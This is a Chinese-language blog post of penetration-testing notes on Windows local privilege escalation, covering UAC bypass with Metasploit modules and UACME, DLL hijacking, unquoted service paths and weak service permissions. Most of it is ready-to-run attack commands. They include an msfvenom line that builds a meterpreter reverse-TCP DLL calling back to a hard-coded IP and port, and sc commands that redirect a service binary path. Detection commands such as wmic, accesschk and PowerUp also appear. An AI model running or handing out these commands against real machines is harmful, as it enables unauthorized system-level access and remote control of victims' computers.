Windows本地用户提权(二)

BypassUAC提权

MSF模块

UAC:用户控制机制

windows 7:

use exploit/windows/local/bypassua
get system

windows 10:

方法一:use exploit/windows/local/ask  \钓鱼攻击,需要管理员在win10上点击确定
方法二:use exploit/windows/local/bypassuac_sluihijack
方法三:use exploit/windows/local/bypassuac_silentcleanup

UACME 项目

https://github.com/hfiref0x/UACME

Akagi64.exe 41 msf1.exe   \Akagi64.exe 编号 调用执行(在被攻击主机上执行) 41数字可替换,常见23 61 41
getsystem  (在MSF上执行)

DLL劫持提权

提前信息收集相关第三方软件及DLL问题程序,本地调试成功后覆盖DLL实现利用

过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功

检测: ChkDllHijack 火绒剑

项目:https://github.com/anhkgg/anhkgg-tools

利用火绒剑进行进程分析加载DLL,一般寻找程序DLL利用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117  lport=4444 -f dll -o xiaodi.dll

引号路径提权

服务路径如果不带引号:空格以后的会被当作参数,不再是一个整体

如何寻找不带引号的服务路径:

可以利用的路径需要满足的条件:不含引号+含有空格

检测语句:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

不安全的服务提权

检测脚本:accesschk PowerUp(PowerSploit)

1、accesschk.exe -uwcqv "administrators" *

2、Import-Module .\PowerUp.ps1

   Invoke-All Checks

https://github.com/411Hall/JAWS

https://github.com/PowerShellMafia/PowerSploit

sc config "test" binpath="C:\Program.exe"

sc start test
posted @   Arongsec  阅读(168)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示